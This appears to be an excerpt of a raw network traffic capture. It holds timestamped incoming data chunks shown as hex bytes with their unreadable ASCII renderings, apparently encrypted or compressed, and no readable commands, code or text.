                                                                                                                                                2022-09-29 12:51:55 UTC33737INData Raw: f9 96 59 68 27 2c 1e 1c a5 26 d1 fd 14 7b 34 70 db 53 d1 c1 6c 3f 79 68 a1 9d 07 6d 7f 0a 99 f8 c6 c3 d5 e8 cf c0 14 c5 8d b6 ac 29 e1 07 27 99 ce e8 4b 42 6b c3 b3 ad ee 11 ef c8 b6 cc d2 22 74 6c 0a 2d d7 14 4b 83 28 43 b0 a9 00 88 72 76 f7 98 4c af ee 4f 8c 14 e6 47 23 af c7 da 85 ce 71 ab ff 1b 63 f8 23 4f be 46 76 16 6e 08 4b 71 6a f2 bc 5b b1 b7 02 be 04 b8 21 61 5e 0f 24 2b bf 5e 19 bc 68 23 87 74 36 72 52 d3 1f 5c 43 96 c2 b4 26 15 46 e5 c3 1c f8 d0 1a f6 c4 b4 06 dc 92 d9 9d 53 d4 f6 22 6d 95 50 b2 c2 a0 b8 5a b0 c7 88 c7 0f 44 ce f4 5d 2d 40 64 52 75 4c 11 0c b6 23 c5 a7 de 92 10 42 74 9b 41 d6 9d ea f2 c0 de c5 a8 08 7d e3 76 a9 b4 2f 7b 65 f2 4f 93 8f dc d4 f8 6d 32 d9 85 73 24 c1 14 58 7e e0 3c 91 80 71 57 2c ec 1f 1c 03 12 e5 31 0b 6b c9 22
                                                                                                                                                Data Ascii: Yh',&{4pSl?yhm)'KBk"tl-K(CrvLOG#qc#OFvnKqj[!a^$+^h#t6rR\C&FS"mPZD]-@dRuL#BtA}v/{eOm2s$X~<qW,1k"
                                                                                                                                                2022-09-29 12:51:55 UTC33753INData Raw: f7 75 3d a1 b5 cd 53 9e ac b1 24 45 0a 08 d3 9d d4 11 9e 1a b3 71 97 58 f2 74 1e ec c3 82 46 ed 11 4c 93 df cc 9c 60 77 eb b0 3f 4e 40 30 9b 6c 19 da b5 12 de ec c9 75 93 94 74 54 76 ed 50 65 e5 fc c8 1d 87 06 d0 10 d9 b6 6a 1a f1 19 db fb 8a 58 f0 ec 37 9b 20 7f 48 47 0e 43 39 d6 6d 09 cb 26 d2 a5 71 1d 91 31 d3 a3 58 8a ba af 0d 16 cc 00 0e 9c 58 87 16 2a 1a 0f d1 31 65 47 ba b4 e7 b4 6a b3 64 0c 74 43 b0 30 f5 68 8a 9f 32 b7 26 24 77 fd d5 4e a1 fe 34 a9 0f 34 bf 41 df a7 3a ba 98 5e eb 17 ef 0e a3 6d c9 8a 60 bf 8e 85 90 91 cb 0b c5 32 a6 54 68 91 0b ab 2f 61 cc 39 87 94 d9 6f da f8 5d f4 0e 7c 3d ae 8c 58 90 01 9c cb cb 04 a0 e6 84 21 52 8b 09 77 3a 6b cf 2a c2 e9 d1 eb b1 91 02 24 8b e8 af ec a2 3d 1c b2 49 e6 3e b4 1c f2 58 f6 d7 ae a1 f1 e3 12 4a
                                                                                                                                                Data Ascii: u=S$EqXtFL`w?N@0lutTvPejX7 HGC9m&q1XX*1eGjdtC0h2&$wN44A:^m`2Th/a9o]|=X!Rw:k*$=I>XJ
                                                                                                                                                2022-09-29 12:51:55 UTC33769INData Raw: 41 f9 54 f4 b1 52 e4 5b 51 1e 91 f0 59 fa bc 8c ec ee 91 73 d8 a0 08 66 1f ab ef 54 ad 02 79 9d bf f9 a3 0b d8 25 87 ec 02 f4 72 d5 25 e1 b2 21 93 94 4e df f0 f5 ae c1 2f cb 75 da 9d 4f 49 0b b0 a7 94 8e 49 b7 b0 d1 45 0a 9f d9 56 e9 00 bc cb 41 a9 44 94 8e cf ab 65 1e 38 71 27 c0 c4 b3 95 d3 39 8f 7c b1 60 40 b0 85 de 31 01 b1 fa b6 5e 15 6e ff 3b b8 20 18 5e c9 33 b4 95 de c8 8d 1e c0 a4 5f 49 a2 33 41 fd 4e 0c 0f 56 0b 9c eb 9a 45 3b 25 13 89 e4 a1 c3 91 40 30 13 67 15 a0 38 e7 30 f6 1b 69 29 df 84 79 dc 90 3d 30 51 f1 7c 56 d4 bd ca 3c f6 ad 1e 40 6f 17 06 39 28 79 02 d3 99 7b 93 ce fe ee b7 12 21 73 73 29 ea fc 30 dd 24 41 3b 2f 46 a7 b9 be f8 fc be aa 2c 3b 10 c6 10 6a 12 b5 ac 29 90 83 0c f8 56 84 67 67 6d 60 03 26 e3 2d 77 e0 f0 11 bb aa 66 15 22
                                                                                                                                                Data Ascii: ATR[QYsfTy%r%!N/uOIIEVADe8q'9|`@1^n; ^3_I3ANVE;%@0g80i)y=0Q|V<@o9(y{!ss)0$A;/F,;j)Vggm`&-wf"
                                                                                                                                                2022-09-29 12:51:55 UTC33785INData Raw: 1f 6f 3b de 43 04 6d e9 f2 dc 4d 76 ac ac 0f 84 19 01 cf d1 f2 af f8 4c f6 97 70 25 2a 12 4d bd e4 e6 c9 48 03 7b 21 0a f5 b4 af 52 9f e6 34 2e 9d d9 92 a3 2b d5 86 94 67 4d b1 4a 23 26 c6 d1 3e ff 6c fc 76 9b f2 3a 2e e7 d0 e1 e7 4c 9f fe 4a 0a 20 a8 25 0d 69 8c 14 3a 73 11 15 77 45 b8 e0 75 c0 af bf 48 61 a8 24 ea ac 07 6c e1 3e 9c 52 d6 e7 43 d2 82 38 c1 0a f4 8c d3 66 68 3c 4f e5 2b 08 40 10 f7 84 3b e9 e1 75 b5 da 08 06 a0 a5 9b 3c e4 39 57 43 48 7a 82 f6 c3 bb 9e 42 95 36 78 81 d6 00 9f 6b 0c 31 e9 4d 76 55 a2 fc 91 11 01 bc 49 fb fd e9 53 94 0d 6a e0 bf 13 73 32 ba 75 af 11 37 1e 77 00 fe 26 f2 97 f3 9e 37 66 d4 01 54 17 69 e3 f5 26 76 e0 67 46 0d cd 52 16 6d d2 22 c8 91 3d 18 97 22 8b c9 8f 66 d0 91 de 73 af b0 9a 0a b0 35 77 1b cc e6 32 41 6d 88
                                                                                                                                                Data Ascii: o;CmMvLp%*MH{!R4.+gMJ#&>lv:.LJ %i:swEuHa$l>RC8fh<O+@;u<9WCHzB6xk1MvUISjs2u7w&7fTi&vgFRm"="fs5w2Am
                                                                                                                                                2022-09-29 12:51:55 UTC33801INData Raw: 84 26 41 21 f6 56 6f f2 7e 33 b9 47 6d c1 56 20 e2 f8 05 9c e9 7f 25 7d 04 a0 2e 4d 04 52 fa 95 a7 66 2c 32 ff 5b 29 dd dc 47 0d cd e7 c3 8e e6 0a 39 40 09 6a b3 b8 b9 a5 8c 2d 81 a1 4e 73 9e 58 f0 fe f9 43 ad ed 34 8c 8a f3 7a af a8 1c e3 9e 26 b0 fd e5 1f a2 78 6f fe f2 45 6a b4 84 6a 4d a5 6c 7a b1 cf 52 c0 a7 5c 39 62 26 ec 03 f9 a5 58 39 bf bd ae 48 8b dc 7a 62 48 01 4e 8c 7e 69 47 b2 6c b5 e2 9f 61 53 22 fb 67 fe 02 32 c5 93 75 f3 bb dc 5e 7b bf ed 67 16 7c be 1a a6 f6 cb d6 65 08 1d d6 97 46 03 61 e7 08 89 36 c4 3a ba 81 77 0a 45 7f 4d 33 d9 43 36 50 17 ae f3 06 fe 48 c5 c2 df 8b 68 64 c8 70 19 15 4e dc e2 5b 47 f6 a5 1a c2 20 25 1c b0 4d 42 b3 47 4d f8 67 d0 59 95 aa 39 57 a2 d1 d7 19 2a 4b 59 d9 a5 f3 dc 12 71 10 0f ea 30 ce 62 7e e9 38 8e 1e c8
                                                                                                                                                Data Ascii: &A!Vo~3GmV %}.MRf,2[)G9@j-NsXC4z&xoEjjMlzR\9b&X9HzbHN~iGlaS"g2u^{g|eFa6:wEM3C6PHhdpN[G %MBGMgY9W*KYq0b~8
                                                                                                                                                2022-09-29 12:51:55 UTC33817INData Raw: e9 e1 9e 57 6b 46 72 1c 2f 86 5e e5 de 4f d5 10 e0 70 91 31 8d 5c 4b b0 1a 84 34 5b d5 d4 72 16 78 db f9 17 71 56 e2 e4 21 78 53 75 a0 c9 44 68 f1 ae f6 3d d2 c9 c4 d7 c5 18 f9 05 09 39 15 24 c2 29 50 46 cf a7 08 5c 99 0e f5 cc 06 96 56 b7 ed 5a 08 57 aa 20 1a dc 0d cb ad b6 72 66 f7 a8 ab 3a e9 05 11 58 fc 50 34 3d 9f 2a 6c f0 60 8c 67 47 c6 0f a6 2e 56 06 76 dd e6 4c 96 4d 24 86 a5 8c 41 47 9c 7e 79 bd b1 71 f9 93 d8 a0 d0 68 78 fb 4d 7f f1 de 66 8c 2f bf 1f f7 74 ce d6 74 8d 68 e8 1a 35 f9 bb ee 90 b5 ab dc 49 bb ae 11 26 28 03 bb e2 de 5c d1 1d 4c fb 9e 96 ef d3 66 f6 25 50 d2 21 65 78 f9 de ed 72 57 92 92 83 3d 36 66 77 94 53 83 6d b6 9e de 32 79 63 73 b9 98 12 44 7b ab a2 03 a9 03 5a a1 86 47 1c 6c 8a 07 bd c5 9c df 82 c5 f4 a0 bb f4 e4 a6 46 00 11
                                                                                                                                                Data Ascii: WkFr/^Op1\K4[rxqV!xSuDh=9$)PF\VZW rf:XP4=*l`gG.VvLM$AG~yqhxMf/tth5I&(\Lf%P!exrW=6fwSm2ycsD{ZGlF
                                                                                                                                                2022-09-29 12:51:55 UTC33833INData Raw: 85 24 49 10 df 69 34 06 eb 2d 57 83 85 4d 85 bf 38 c5 16 ed b7 62 f5 9b df 72 1c ca 2f a7 92 a6 17 8b 05 28 59 e1 ca 08 0a ed 59 1b 8d 52 6e 7d a0 70 cd 7a 23 bf 3e ac f6 ba 0f 1b 88 61 0e c1 fd 7b 31 76 38 52 a3 00 66 57 68 fc 2c 62 69 ba a3 94 e1 d1 95 f9 7c f1 61 6f 6f f1 e5 1d 72 8e 47 15 ab 19 d2 1f 52 af e4 e3 f5 80 79 bd 0c 58 4d 3d be c0 8a f2 e4 d2 dc e0 9f 91 d0 ef 95 14 cf 41 2d 7b 08 26 88 08 82 91 2a 44 ca 19 5a 3d 2d f5 e1 ff 6f dc 1b ec 3a 93 0e 9b e4 37 f9 7a e9 66 42 fe 27 66 a0 2e 19 b4 f3 ae c9 8d 68 cc c6 ad 13 ba bf 96 b0 4f 94 a1 56 dd bd ea 2b e9 1e 16 a8 c4 d5 c5 4a e0 91 13 0b 06 85 57 ae 0b a6 55 e5 f5 a2 0a f5 f0 11 f7 db 10 1c b7 8a c4 d2 5b ab 40 7f f8 f8 a4 5a 19 73 53 17 dc a1 26 9c cf b5 d9 65 7a a7 67 56 78 8c e3 a7 76 54
                                                                                                                                                Data Ascii: $Ii4-WM8br/(YYRn}pz#>a{1v8RfWh,bi|aoorGRyXM=A-{&*DZ=-o:7zfB'f.hOV+JWU[@ZsS&ezgVxvT
                                                                                                                                                2022-09-29 12:51:55 UTC33843INData Raw: e7 39 48 11 10 29 b7 a1 1a c0 8a d8 d8 e5 f6 bf c9 9d a9 83 2c 26 b5 0c 26 d9 ec d3 5e cb cc f5 fe 3d 59 67 55 e0 2c cd 2d 44 c3 25 b7 e5 72 6c 7d df 63 f2 bf 17 7e 86 7b 2d 54 d0 6e f1 bc 62 2f 76 f4 84 61 a2 0f bf b8 cb 45 b7 c0 de 75 27 e4 79 ae fd 06 9e 1d 87 54 24 26 a5 0b 33 7b 47 3c 2a 02 8a 63 be 38 45 bc 6b 82 6c 36 c8 64 a3 09 71 72 67 81 91 ea 02 c4 b0 67 8d 9b 60 80 f7 30 e1 99 89 b3 da 03 b4 6e db 32 08 da 2a 38 a6 cd 3a a7 f1 ee ad 62 a4 ab 6f ca 27 4e 7f 11 0c 6b 17 09 47 0c 02 a3 06 00 ed d6 d1 9a 14 a2 c2 c0 7c 8a 11 a1 c3 6c 36 36 b9 17 98 e2 e0 6b 5c 47 7d a3 b9 61 fe 4f f8 f4 fb fd 1c 3c bb 6c ed ff 1f fe 8a 18 6e 4f c6 2e 42 c5 d0 bc e1 d3 37 4e 11 e6 d7 de 94 b5 96 bb da 29 d4 c6 0a a0 fc 78 3e 5c 92 8a d5 a3 54 c7 87 30 1a 0b 3e f2
                                                                                                                                                Data Ascii: 9H),&&^=YgU,-D%rl}c~{-Tnb/vaEu'yT$&3{G<*c8Ekl6dqrgg`0n2*8:bo'NkG|l66k\G}aO<lnO.B7N)x>\T0>
                                                                                                                                                2022-09-29 12:51:55 UTC33859INData Raw: 47 a9 f9 4f 82 1c 63 91 ab 36 d9 c2 6d 99 f3 39 55 1d 96 de 97 91 94 85 66 38 5e d8 27 15 c4 46 12 4c 05 aa 0d 45 67 5f 1b cd 1b ba 0b 26 66 11 1d 98 29 43 9c 67 64 d0 d9 53 6b 0c fe 09 f3 64 49 85 3d 6d 56 47 48 4c a7 06 9e 1a 5c df eb a2 3f 3d e1 c2 1e a7 0f e1 9f 38 e0 93 7f 7a ad 21 49 e1 44 6d af 84 6c 0f a6 12 dc 79 7b 4f 23 e9 7c dc 33 1b 8e e6 ac 23 17 e2 e9 6d 26 49 3c 31 0a bb e6 dc f4 2a e8 a4 bc 11 24 23 6a bd 0b 6f 70 a3 c8 73 f2 82 c2 14 23 c0 6a 84 10 11 c0 1a 7b 41 73 3d 56 ab 75 b9 0b 46 12 99 72 4f b1 90 7c 0c 7a 2c 46 7e 3a e5 5a bb 30 c4 04 bf cc 22 ae c9 41 1c ac d5 3e c3 0d de 0b 84 e3 9d f3 e4 7d 6f 91 90 f3 5f c8 4b 52 51 5c fb 7b 39 3a fe 83 aa 75 0e 95 6a 15 f4 18 cb ec d9 9e 0f 16 5c ab 48 65 5d 53 08 01 fe 99 3e 59 0e df a3 f5
                                                                                                                                                Data Ascii: GOc6m9Uf8^'FLEg_&f)CgdSkdI=mVGHL\?=8z!IDmly{O#|3#m&I<1*$#jops#j{As=VuFrO|z,F~:Z0"A>}o_KRQ\{9:uj\He]S>Y
                                                                                                                                                2022-09-29 12:51:55 UTC33875INData Raw: 3a cb e6 b1 0e 87 68 5a 65 d8 0d 10 7f 68 8a 1e 1e 11 ae 08 10 0d dc 6e e7 3b 3c 54 2f 62 f0 57 13 e0 fe 34 82 53 81 d1 76 4b a3 23 d1 bd 8a 03 36 5f a9 78 5a 6f 5d 71 c4 70 d7 dc e6 e4 c5 13 15 8e a9 2b db 1d 23 bc aa f4 54 0a af 11 57 f4 f9 b1 54 3e 3e 31 92 b3 c3 69 55 70 73 9f 95 80 a5 70 a9 6d ec 0f b3 b8 51 41 7a 67 02 6f af 3f d0 ed 70 e3 14 60 06 66 91 53 0c 42 eb e8 50 6c a2 11 be 45 15 35 a2 25 45 2d 4c ef db fb 5c 8c 22 be 5d d8 9a c9 4b 42 6b 7f d5 23 30 5b 5f 42 e2 2c 2b dd 41 f6 71 0f 65 8a 32 9e 74 3f f0 de 88 09 5c f7 c1 26 ad 16 2a aa 94 7e 78 4c b2 2d 15 20 6e e5 36 6d eb 19 9d e9 d7 b7 a3 b3 94 e6 54 d5 ae ab 03 52 87 bc 06 e9 a8 6b 12 61 24 75 11 de 1f 8a ac 3e 96 70 80 de a7 bd 57 e0 7b f1 ba ce 43 40 6d 26 88 7d bc af 1a 61 f1 6e 17
                                                                                                                                                Data Ascii: :hZehn;<T/bW4SvK#6_xZo]qp+#TWT>>1iUpspmQAzgo?p`fSBPlE5%E-L\"]KBk#0[_B,+Aqe2t?\&*~xL- n6mTRka$u>pW{C@m&}an
                                                                                                                                                2022-09-29 12:51:55 UTC33891INData Raw: 8b c5 52 e2 8c f0 0b 5e 9a 1f 07 84 ae f7 59 c2 d9 4a 43 69 8f 01 a1 e8 69 9a 41 9d c7 d7 1f e7 f3 5f 8b dd 1c a5 c6 31 6f b0 cc 44 3a 78 c4 02 bc 48 aa 21 8b b7 8c fe c4 21 16 f0 70 50 e5 eb 4d b8 0d b0 77 40 23 91 46 56 30 ef f8 f8 56 a4 a0 26 0e 9b e9 bc 2b a9 3a 2f 59 d3 33 77 d4 87 10 0d 31 53 92 f2 bd 2e 70 39 a3 34 c6 50 7e eb 13 62 a1 db 16 d2 f0 03 0b c2 6b 18 01 d5 e2 60 9d f6 75 5a 14 58 c3 86 ae 90 4e ab d7 a8 77 bb 26 05 55 f3 64 1d 5a 8e d8 15 83 27 e0 ad 06 d1 e3 54 b0 f2 54 1b 29 4b 98 61 c3 f9 ad 9c 37 47 66 4c ee ca 09 44 77 8a 48 e3 41 85 4a c0 f2 75 0f 7a 5b 27 e6 a9 99 16 2d 67 8a 3d 2d 4f 9f 10 e0 79 dd 39 1a de ef f3 5e 79 33 f4 35 e4 ab 9b c6 48 fc 16 1b 0a 83 35 93 ff df 9d 9b 4c 18 0f bc 51 72 3c e3 b8 08 6c 1f ab 99 d4 ee 33 76
                                                                                                                                                Data Ascii: R^YJCiiA_1oD:xH!!pPMw@#FV0V&+:/Y3w1S.p94P~bk`uZXNw&UdZ'TT)Ka7GfLDwHAJuz['-g=-Oy9^y35H5LQr<l3v
                                                                                                                                                2022-09-29 12:51:55 UTC33907INData Raw: 1d b1 c8 b7 24 03 28 da e2 f6 ac c0 38 27 64 7a 3a 76 08 c3 a2 c4 b5 c7 44 19 35 c4 61 01 a2 28 cb 00 16 c0 d9 e3 8b 52 49 24 66 77 fe b1 2b 65 43 c7 06 93 5e 32 6c ea 7d bd 89 9a 8e 4a d5 8e d2 03 7b 69 9b 5a d7 19 7f 79 c3 f1 21 31 38 a5 76 c8 10 38 9b bd 4f a9 dc e6 96 0d 88 32 b0 f3 4c 1c 02 ee e1 39 0a d4 24 e5 83 94 0d a1 c3 ab 89 68 81 7d 5b a1 1b 23 72 23 12 53 92 60 63 59 10 38 3a 7b 30 90 93 d2 59 83 67 5f 36 bc a4 6c 26 17 32 8d a2 38 1d 89 21 e5 66 f5 fa 6f 75 80 b5 e9 c9 61 53 cb af c6 11 ec d1 e6 3c 2b cd 0c 33 28 5a 5e 75 2a b0 4f 32 01 f5 e0 2b 14 77 ca a8 69 6d 0e 73 88 e0 58 74 ae 39 c4 c4 b9 b0 d7 b4 a8 5f 09 66 41 55 34 96 a0 89 72 8c be 93 10 c8 5e c4 76 9a 5f cb 11 06 72 3f 3e 1a 6e 96 42 9e 3b 42 d8 7e 1b 4f d8 9e 92 24 1c e1 5d e7
                                                                                                                                                Data Ascii: $(8'dz:vD5a(RI$fw+eC^2l}J{iZy!18v8O2L9$h}[#r#S`cY8:{0Yg_6l&28!fouaS<+3(Z^u*O2+wimsXt9_fAU4r^v_r?>nB;B~O$]
                                                                                                                                                2022-09-29 12:51:55 UTC33923INData Raw: 95 2b e8 f6 2e 9b 48 ad a4 92 08 55 67 ee 00 4c 50 b7 dd 8d 38 be 5b 9f 98 5b e7 91 c0 64 82 55 26 16 28 b4 da c0 89 0d 2b a9 73 7c 18 07 f4 9c 28 b1 e9 e3 6b 48 c3 70 5f 15 83 11 49 2e 1e 44 4d 20 56 bd df 54 ad 8f 58 4c fa c5 10 85 a3 ba 66 07 71 6e ea 36 3d cf 83 b5 1f 54 47 ac 8d 43 05 b5 3c 5c 00 1e 68 e5 9b bd 26 87 70 20 90 31 1f 49 5f 19 de 81 3e ac 5c 75 b4 da 27 0e 6e 4b 67 40 11 cf a4 53 c2 e0 9c 7e 51 71 c8 b9 6f b6 d3 ab 27 5d 50 0f 92 bf 3b 52 c6 8f b4 88 6d 19 1a 65 18 0a cc ee da 73 ed 1d 4d 46 51 44 43 5c 2b 82 08 62 48 90 0c 24 8b 19 a8 af a5 36 d3 92 d3 de cf 0b 42 e8 9e 9a d6 33 8b 5c 4c 28 07 4f 29 c4 09 15 40 bf c4 3d e3 61 de 38 85 72 9f 52 b1 6c e0 2d 51 3f 3a 6c c3 32 2f 9a 05 60 79 09 d4 0f 09 59 c0 48 b3 45 d1 76 63 ed c9 de b3
                                                                                                                                                Data Ascii: +.HUgLP8[[dU&(+s|(kHp_I.DM VTXLfqn6=TGC<\h&p 1I_>\u'nKg@S~Qqo']P;RmesMFQDC\+bH$6B3\L(O)@=a8rRl-Q?:l2/`yYHEvc
                                                                                                                                                2022-09-29 12:51:55 UTC33939INData Raw: d8 84 fa 0b 20 dd 7b 73 4e c9 11 06 51 a2 04 e9 24 d2 20 05 31 e8 cc 7a 45 77 85 c7 80 c4 c9 5f e5 b2 d0 d1 c1 8e c9 e7 c3 0c 7d 48 a1 af 95 bb be 65 fc 41 42 6d 42 6e 32 72 b1 a4 0c 2a 8f 44 76 ab 28 ec c2 53 6d e4 77 de 3e de a7 51 ed c2 44 3b 3f eb b7 cb d9 6a 7c d1 16 a5 5d 80 48 7b 99 dd ff 08 1e 0a 41 85 24 09 86 5f e9 9a 96 e4 07 d6 ad de 95 57 34 e9 46 bc d3 5d 0d 2e 6f 22 3e 7c 5d 05 82 e7 20 84 b4 9d 83 e6 95 e5 a9 8b 7a ca 5d 78 06 5b d8 f7 b3 f3 f6 f3 8d 44 50 86 53 c7 e7 6f 2f 62 17 31 0d 11 a4 e0 1b 4d 60 ed 05 dc 6b 13 6f 6b 7d c0 dc 81 d8 29 8c c9 86 b1 cd 78 aa 66 e7 5e a2 9b 4f d1 8d 15 2f 96 f6 4b e9 65 58 2f 85 16 96 d6 9a b4 94 66 a0 2d 49 c3 a1 98 b2 d7 7e 02 e3 32 73 24 d9 5c db 6b 77 68 45 a3 4a dc d2 50 f0 22 1b b8 7f 57 09 c6 65
                                                                                                                                                Data Ascii: {sNQ$ 1zEw_}HeABmBn2r*Dv(Smw>QD;?j|]H{A$_W4F].o">|] z]x[DPSo/b1M`kok})xf^O/KeX/f-I~2s$\kwhEJP"We
                                                                                                                                                2022-09-29 12:51:55 UTC33955INData Raw: 40 6c e8 4b 78 e9 eb 47 c6 6a 21 99 b1 1f 59 2c 4c d4 90 7b 77 0e 6a d1 61 95 a8 81 5d a7 d3 03 77 70 ee 25 50 c5 b9 69 9a 8d 2c 39 e4 34 23 f3 31 9c 6f 2e c3 0f 6b 6c 98 fd 13 27 9d 16 c1 22 8f e2 5c 75 be b3 98 e7 52 d4 41 02 7d 75 bd c3 71 2c 10 fa 43 e6 89 da d8 d8 da 01 c6 07 cc 12 17 b0 7e 48 42 ee fa bd 8a e4 9e 34 a2 6f 7a 50 7d 67 6e d1 a8 2f 38 8e 4d 5f e2 c4 63 fd 10 b9 4c 1d 0c ff cc dc 90 b0 6f b6 3e 89 13 11 19 76 5e 76 56 17 9f db 7f f5 46 65 15 84 66 e7 c1 b8 8a b9 0a 80 16 39 b1 a9 92 22 88 b3 b8 c1 09 94 a4 bf ba 18 08 10 e3 9f d8 7e b6 06 fc be b5 f3 be 0d 51 eb 2e 17 b0 b2 01 42 97 e4 8d 26 f1 e5 9a e1 c7 87 87 43 b6 fb 84 52 7e 8e d3 00 10 92 e0 e4 62 88 63 fa ff f1 6f 17 9f fd b5 b6 0e 2c 57 35 d3 11 4a 3f 3f 36 5b 6c e9 30 7e 22 18
                                                                                                                                                Data Ascii: @lKxGj!Y,L{wja]wp%Pi,94#1o.kl'"\uRA}uq,C~HB4ozP}gn/8M_cLo>v^vVFef9"~Q.B&CR~bco,W5J??6[l0~"
                                                                                                                                                2022-09-29 12:51:55 UTC33971INData Raw: 4c 16 52 2a cb 17 33 fb b3 dc ce ab 37 2b d6 36 c2 cc 05 de 9c 83 a3 23 dd 3c 6a d7 9d 18 3f 07 10 0f 8b 9e 74 4d af 52 1b f1 cb a2 0b e1 ac 71 50 72 5d 06 cf 47 e0 5e 5e 29 d9 78 b9 ff 48 e4 d0 b9 0e af d1 ab 70 15 30 f8 f6 b3 24 37 3c 45 4a 1d 15 b6 2f 60 43 d9 84 90 87 6f 5d 29 79 8f 84 b1 52 ba 91 99 a2 6d 2c 2b 46 45 73 cf 58 5b 53 1e e7 b4 4b 56 b1 44 6f 84 3b 30 de 24 54 8e cb 63 00 b8 a5 78 d5 9d 0c 71 33 51 e6 5c 80 6b 41 58 c6 c5 25 c5 ce a5 85 6a 7e c2 37 8c b6 b0 5f 54 eb 75 4b f7 4f 6b 5e 25 62 34 82 d1 22 bf bc 0d b5 71 8b 82 eb e8 74 8b 91 1e 8e f5 a1 97 be fd 39 b3 e9 15 b3 6f 05 86 5b cf fd 52 c1 69 9a 25 a8 99 18 b9 4c 11 28 a9 18 78 8f 5e 89 fc 41 5f b9 09 71 d9 45 68 09 98 93 6d 31 a0 0e e5 90 c2 29 c8 d1 21 ff 53 02 54 1f 35 b9 84 05
                                                                                                                                                Data Ascii: LR*37+6#<j?tMRqPr]G^^)xHp0$7<EJ/`Co])yRm,+FEsX[SKVDo;0$Tcxq3Q\kAX%j~7_TuKOk^%b4"qt9o[Ri%L(x^A_qEhm1)!ST5
                                                                                                                                                2022-09-29 12:51:55 UTC33987INData Raw: 35 58 7f 8f f2 3f 8b 86 a7 3d 3b b4 90 bb b8 51 fd 87 b7 bb 81 cc 32 83 9a 70 af 40 ed f9 30 5b 70 f0 d1 c3 06 2d 6d 3f 1b e6 20 98 c4 e6 16 b5 f7 c5 84 af 13 a1 6c 03 26 32 dc 7f f1 ce eb 30 e2 37 94 fa 8d eb 8c 5f a7 41 9b f2 01 f4 d9 4d 6d be 16 7e 2c d0 4c 7e 95 a9 c4 5f 39 68 6c d1 7a 88 90 38 d6 6b ee a6 1e 44 7c c3 04 d4 4e f4 67 4f 4d f7 6f 4d 3a 5a d4 9d 04 9c 04 17 bc 46 ae 10 70 8d db 15 f3 80 8a 3b 4b ea b4 37 75 f8 d5 33 d7 38 5b 02 fe 76 dd 2f 5a b9 64 7a 72 5a 81 9f 67 d9 6f e1 73 31 49 e3 a2 4c 49 5d da 8e 44 ad 89 11 72 91 94 0d 1e a4 2f 58 64 e2 a6 3f 3d ae 75 d7 22 e4 e0 b5 fb 5f 55 c9 06 86 df 78 64 ee a1 48 9c 33 0a e0 a4 3e 32 56 11 c6 d3 24 01 1e 4a 68 11 20 27 18 8b 97 9e a6 7b 51 af db a9 79 9a 88 8d 8b 67 52 9e da 75 ee bf f6 be
                                                                                                                                                Data Ascii: 5X?=;Q2p@0[p-m? l&207_AMm~,L~_9hlz8kD|NgOMoM:ZFp;K7u38[v/ZdzrZgos1ILI]Dr/Xd?=u"_UxdH3>2V$Jh '{QygRu
                                                                                                                                                2022-09-29 12:51:55 UTC34003INData Raw: 7c d4 d7 45 67 16 35 7e 27 1e 7b 8e c9 80 ad d1 1e db 82 80 ac d6 2f 2a b6 2c a3 fd 38 3a 29 cf 32 36 a7 95 35 37 14 19 d1 d8 0d 5b a2 f3 f5 47 d5 37 30 03 07 c1 b4 e6 da 11 2e ab e7 e8 ee 0c 41 2c 8a 45 fd 03 88 86 7f 6b 0a 13 76 ec f5 3d d3 b6 a8 17 fc 92 09 b1 d8 19 1d a5 25 0e 65 25 d5 0e c2 45 87 49 de 68 2d c4 0e 53 31 46 da 13 79 29 49 43 16 26 b6 22 8d 5d 02 40 1e 36 96 45 3d f8 0d 35 57 fa 0e 2f 8f 8e e5 9f 9f c2 9b 3a 11 54 14 0e 75 e3 38 3a 7d fb 22 ee 8f fb f4 31 a6 f3 83 de 53 6a f9 9a cc 92 e6 c1 96 81 ca 55 a0 cd 4c 0e 73 d9 8c c8 11 dd a0 eb 1f 95 cf cc 2d 67 87 85 4b ad 36 04 aa 4d f2 e0 21 2b fd 2e 63 31 cb 38 5f 49 c4 00 36 85 2c b2 78 0f 92 97 b1 c7 ab b6 61 a9 80 6c 10 77 9b de ec 49 9e 8f 67 50 b2 19 97 dc 84 f9 03 68 34 45 a9 9c 92
                                                                                                                                                Data Ascii: |Eg5~'{/*,8:)2657[G70.A,Ekv=%e%EIh-S1Fy)IC&"]@6E=5W/:Tu8:}"1SjULs-gK6M!+.c18_I6,xalwIgPh4E
                                                                                                                                                2022-09-29 12:51:55 UTC34019INData Raw: c5 fd ca ae e4 44 fd 84 a1 e9 a4 34 1b eb 9a ae c4 d0 a2 78 f8 02 1c 35 e6 49 31 d5 ca 13 5b dc a5 d8 fe c8 c0 08 22 d9 76 e7 a9 51 f2 7a 8d 4c d3 dc 09 31 cc 78 35 8f ac 01 76 e0 9b c7 82 fc a0 af 75 3f 6f 1f b9 6c 79 4a 19 a4 03 7f a5 a3 5a 92 15 77 76 1c f8 d3 0c d3 99 e0 06 85 d3 35 bf 9a 72 0a 21 f2 d5 bc 15 a1 9f ef b0 ed fe 18 99 06 6b 98 3d a3 b6 e8 27 36 0d 0e ba 1e b1 0b 70 fc 79 3c fb 77 41 ec 83 fc 6e 28 c9 40 b4 db a6 67 10 98 8d 17 eb ce 76 08 ab 9b 29 e6 40 05 0f d2 cb 8e 46 2c e0 e9 04 f0 6d f1 70 82 d8 17 23 b4 1e f6 2e 35 cf 12 1f 16 e5 20 b4 6e 30 ab 64 db 37 66 26 0c 93 b8 ca ff 38 b8 c8 74 f7 8d 1f 72 c4 0c 46 aa 52 e4 33 88 97 31 b8 d6 f1 de c0 a1 7e a1 eb 87 8e 95 92 1b e9 7b c6 59 52 b4 d7 82 ee 84 2b cc 6a d8 c1 03 43 ef 27 b7 3f
                                                                                                                                                Data Ascii: D4x5I1["vQzL1x5vu?olyJZwv5r!k='6py<wAn(@gv)@F,mp#.5 n0d7f&8trFR31~{YR+jC'?
